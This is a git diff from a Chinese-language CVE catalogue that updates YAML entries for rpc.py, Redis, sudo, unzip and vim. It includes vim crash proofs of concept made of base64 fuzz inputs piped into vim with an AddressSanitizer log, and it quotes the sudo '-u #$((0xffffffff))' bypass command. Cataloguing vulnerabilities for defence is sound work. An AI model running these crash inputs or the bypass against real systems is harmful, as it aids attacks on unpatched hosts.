scope-of-influence: - rpc.py v0.4.2 - v0.6.0 - reference: - - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html - - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd - - https://github.com/ehtec/rpcpy-exploit - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-35411 - cwe-id: None - cnvd-id: None - kve-id: None - tags: - - 远程代码执行 +id: CVE-2022-35411 +source: https://www.exploit-db.com/exploits/50983 +info: + name: python中的rpc库,rpc是远程过程调用(Remote Procedure Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。 + severity: critical + description: + rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. + scope-of-influence: + rpc.py v0.4.2 - v0.6.0 + reference: + - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html + - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd + - https://github.com/ehtec/rpcpy-exploit + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-35411 + cwe-id: None + cnvd-id: None + kve-id: None + tags: + - 远程代码执行 diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml index 7b5dcafb09241e93300148bc8eebd76245c3bdd1..7b0a82da0ac339715ad1bd485bfca15c0a9df2a6 100644 --- a/cve/redis/2022/yaml/CVE-2022-31144.yaml +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml @@ -1,24 +1,24 @@ -id: CVE-2022-31144 -source: - https://github.com/SpiralBL0CK/CVE-2022-31144 -info: - name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. - severity: High - description: | - Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布. - scope-of-influence: - 7.0 <= redis < 7.0.4 - reference: - - https://github.com/redis/redis/releases/tag/7.0.4 - - https://nvd.nist.gov/vuln/detail/CVE-2022-31144 - - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh - - https://security.gentoo.org/glsa/202209-17 - - https://security.netapp.com/advisory/ntap-20220909-0002/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-31144 - cwe-id: CWE-787, CWE-122 - cnvd-id: None - kve-id: None +id: CVE-2022-31144 +source: + https://github.com/SpiralBL0CK/CVE-2022-31144 +info: + name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. + severity: High + description: | + Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布. + scope-of-influence: + 7.0 <= redis < 7.0.4 + reference: + - https://github.com/redis/redis/releases/tag/7.0.4 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31144 + - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh + - https://security.gentoo.org/glsa/202209-17 + - https://security.netapp.com/advisory/ntap-20220909-0002/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-31144 + cwe-id: CWE-787, CWE-122 + cnvd-id: None + kve-id: None tags: 堆溢出, 远程代码执行 \ No newline at end of file diff --git a/cve/sudo/2019/CVE-2019-18634/.gitignore b/cve/sudo/2019/CVE-2019-18634/.gitignore old mode 100755 new mode 100644 diff --git a/cve/sudo/2019/CVE-2019-18634/LICENSE b/cve/sudo/2019/CVE-2019-18634/LICENSE old mode 100755 new mode 100644 diff --git a/cve/sudo/2019/CVE-2019-18634/Makefile b/cve/sudo/2019/CVE-2019-18634/Makefile old mode 100755 new mode 100644 diff --git a/cve/sudo/2019/CVE-2019-18634/README.md b/cve/sudo/2019/CVE-2019-18634/README.md old mode 100755 new mode 100644 diff --git a/cve/sudo/2019/CVE-2019-18634/exploit.c b/cve/sudo/2019/CVE-2019-18634/exploit.c old mode 100755 new mode 100644 diff --git a/cve/sudo/2019/yaml/CVE-2019-14287.yaml b/cve/sudo/2019/yaml/CVE-2019-14287.yaml index 3abae8b78de02523d3e7ce6cbd42ca936e2aeb6a..9eee215b4a414a3636f4028d32be557bcb8fa60e 100644 --- a/cve/sudo/2019/yaml/CVE-2019-14287.yaml +++ b/cve/sudo/2019/yaml/CVE-2019-14287.yaml @@ -1,20 +1,20 @@ -id: CVE-2019-14287 -source: https://github.com/n0w4n/CVE-2019-14287 -info: - name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 - severity: high - description: | - 在1.8.28之前的Sudo中,访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块,并使用精心设计的用户ID调用Sudo,从而导致错误的日志记录。例如,对于"sudo -u \#$((0xffffffff))"命令,这允许绕过!root和USER=logging。 - scope-of-influence: - sudo < 1.8.28 - reference: - - https://access.redhat.com/security/cve/cve-2019-14287 - - https://nvd.nist.gov/vuln/detail/CVE-2019-14287 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-14287 - cwe-id: CWE-755 - cnvd-id: None - kve-id: None - tags: CVE-2019-14287, sudo +id: CVE-2019-14287 +source: https://github.com/n0w4n/CVE-2019-14287 +info: + name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 + severity: high + description: | + 在1.8.28之前的Sudo中,访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块,并使用精心设计的用户ID调用Sudo,从而导致错误的日志记录。例如,对于"sudo -u \#$((0xffffffff))"命令,这允许绕过!root和USER=logging。 + scope-of-influence: + sudo < 1.8.28 + reference: + - https://access.redhat.com/security/cve/cve-2019-14287 + - https://nvd.nist.gov/vuln/detail/CVE-2019-14287 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-14287 + cwe-id: CWE-755 + cnvd-id: None + kve-id: None + tags: CVE-2019-14287, sudo diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml index 8fad732065c69fbaf8d90d4aa442ae726ecbd7c2..044f24e4acfd257ff5e927c14685b083e3a7626b 100644 --- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml @@ -1,20 +1,20 @@ -id: CVE-2023-22809 -source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc -info: - name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - severity: high - description: - Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - scope-of-influence: - sudo@[1.8.0, 1.9.12p2) - references: - - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-22809 - cwe-id: CWE-269 - cnvd-id: None - kve-id: None - tags: +id: CVE-2023-22809 +source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc +info: + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + scope-of-influence: + sudo@[1.8.0, 1.9.12p2) + references: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: - 特权管理不当 \ No newline at end of file diff --git a/cve/unzip/2022/yaml/CVE-2022-0529.yaml b/cve/unzip/2022/yaml/CVE-2022-0529.yaml index 7838180fd3dfd2778f7151668565783599f8887d..c24d3bacaf5eb5526ad5dc288da37390d4420bee 100644 --- a/cve/unzip/2022/yaml/CVE-2022-0529.yaml +++ b/cve/unzip/2022/yaml/CVE-2022-0529.yaml @@ -1,19 +1,19 @@ -id: CVE-2022-0529 -source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529 -info: - name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。 - severity: MEDIUM - description: - A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. - scope-of-influence: - unzip Up to (excluding) 6.0-r11 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-0529 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 5.5 - cve-id: CVE-2022-0529 - cwe-id: CWE-787 - cnvd-id: None - kve-id: None +id: CVE-2022-0529 +source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529 +info: + name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。 + severity: MEDIUM + description: + A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. + scope-of-influence: + unzip Up to (excluding) 6.0-r11 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0529 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2022-0529 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None tags: CVE-2022, unzip \ No newline at end of file diff --git a/cve/vim/2021/CVE-2021-3778/other_poc.txt b/cve/vim/2021/CVE-2021-3778/other_poc.txt index a0d7e45370a486e9acddfa006ee980ee945552d2..c86353be057e7d3106508ea5c4293d9a99055de1 100644 --- a/cve/vim/2021/CVE-2021-3778/other_poc.txt +++ b/cve/vim/2021/CVE-2021-3778/other_poc.txt @@ -1,6 +1,6 @@ -1. -echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt -vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa! -2. -echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt +1. +echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt +vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa! +2. +echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt vim -u NONE -X -Z -e -s -S fuzz000.txt -c :qa! \ No newline at end of file diff --git a/cve/vim/2021/CVE-2021-3778/readme.md b/cve/vim/2021/CVE-2021-3778/readme.md index fa732e1b2f668cc07a6998f1708ad7c45b772b0b..3f0cee118c339caf624b69e8c2ceaedf0b42de48 100644 --- a/cve/vim/2021/CVE-2021-3778/readme.md +++ b/cve/vim/2021/CVE-2021-3778/readme.md @@ -1,11 +1,11 @@ -Exact steps we followed to find this bug: - -1 -- git clone https://github.com/vim/vim - -2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none - -3 -- make - -4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt - +Exact steps we followed to find this bug: + +1 -- git clone https://github.com/vim/vim + +2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none + +3 -- make + +4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt + 5 -- vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa! \ No newline at end of file diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml index a009ea6b6928d8ffc4d92ad40c52ee8e141c520a..d847d833e333770d7024835c8bca83fb89d9a0af 100644 --- a/cve/vim/2021/yaml/CVE-2021-3778.yaml +++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml @@ -1,22 +1,22 @@ -id: CVE-2021-3778 -source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ -info: - name: vim: Heap-based Buffer Overflow in ex_retab() - severity: - HIGH - description: | - vim容易受到基于堆的缓冲区溢出的攻击 - scope-of-influence: - vim = 8.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-3778 - - https://www.openwall.com/lists/oss-security/2021/10/01/1 - - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2021-3778 - cwe-id: CWE-787, CWE-122 - cnvd-id: None - kve-id: None +id: CVE-2021-3778 +source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ +info: + name: vim: Heap-based Buffer Overflow in ex_retab() + severity: + HIGH + description: | + vim容易受到基于堆的缓冲区溢出的攻击 + scope-of-influence: + vim = 8.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3778 + - https://www.openwall.com/lists/oss-security/2021/10/01/1 + - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-3778 + cwe-id: CWE-787, CWE-122 + cnvd-id: None + kve-id: None tags: 堆缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md index 5ad3db9d77d49e6873c94394a59e830af7ef112c..c7b581825a05d748990dbf2931162f5f53e39c61 100644 --- a/cve/vim/2023/CVE-2023-0288/readme.md +++ b/cve/vim/2023/CVE-2023-0288/readme.md @@ -1,101 +1,101 @@ -#### 描述 - -memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出 - -#### 影响版本 - -``` -git log -commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD) -``` - -#### Proof of Concept - -``` -./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa! -================================================================= -==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8 -READ of size 2147479553 at 0x621000009d00 thread T0 - #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e) - #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6 - #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9 - #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2 - #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12 - #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7 - #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6 - #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5 - #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2 - #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2 - #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5 - #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6 - #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5 - #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6 - #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 - #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 - #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5 - #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12 - #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14 - #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2 - #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 - #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 - #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12 - #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2 - #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2 - #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 - #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 - #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad) - -0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00) -allocated by thread T0 here: - #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d) - #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11 - #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12 - #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21 - #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26 - #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15 - #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15 - #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9 - #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9 - #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5 - #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 - #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 - -SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove -Shadow bytes around the buggy address: - 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa - 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa -Shadow byte legend (one shadow byte represents 8 application bytes): - Addressable: 00 - Partially addressable: 01 02 03 04 05 06 07 - Heap left redzone: fa - Freed heap region: fd - Stack left redzone: f1 - Stack mid redzone: f2 - Stack right redzone: f3 - Stack after return: f5 - Stack use after scope: f8 - Global redzone: f9 - Global init order: f6 - Poisoned by user: f7 - Container overflow: fc - Array cookie: ac - Intra object redzone: bb - ASan internal: fe - Left alloca redzone: ca - Right alloca redzone: cb - Shadow gap: cc -==11458==ABORTING -``` - -#### 影响 - +#### 描述 + +memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出 + +#### 影响版本 + +``` +git log +commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD) +``` + +#### Proof of Concept + +``` +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa! +================================================================= +==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8 +READ of size 2147479553 at 0x621000009d00 thread T0 + #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e) + #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6 + #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9 + #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2 + #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12 + #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7 + #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6 + #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5 + #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2 + #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2 + #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5 + #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6 + #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5 + #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6 + #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 + #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5 + #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12 + #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14 + #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2 + #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2 + #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17 + #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12 + #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2 + #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2 + #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad) + +0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00) +allocated by thread T0 here: + #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d) + #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11 + #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12 + #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21 + #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26 + #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15 + #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15 + #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9 + #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9 + #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5 + #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12 + #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove +Shadow bytes around the buggy address: + 0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb + Shadow gap: cc +==11458==ABORTING +``` + +#### 影响 + 这个漏洞能够使软件崩溃,修改内存,并可能造成远程执行。 \ No newline at end of file diff --git "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" index efca437fed854baad8099a88d9efb79bf7879939..303532003b7b71a2b677699078a02e798be7aecc 100644 --- "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" +++ "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" @@ -1,108 +1,108 @@ -# 漏洞CVE-2023-0054 -## Description -Divide By Zero in function adjust_skipcol at move.c:1978 - -## Vim Version -```shell -git log -commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD) -``` - -## Proof of Concept -```shell -./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! -Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! -Floating point exception -``` - -# GDB - -``` -gdb --args ./vim -u NONE 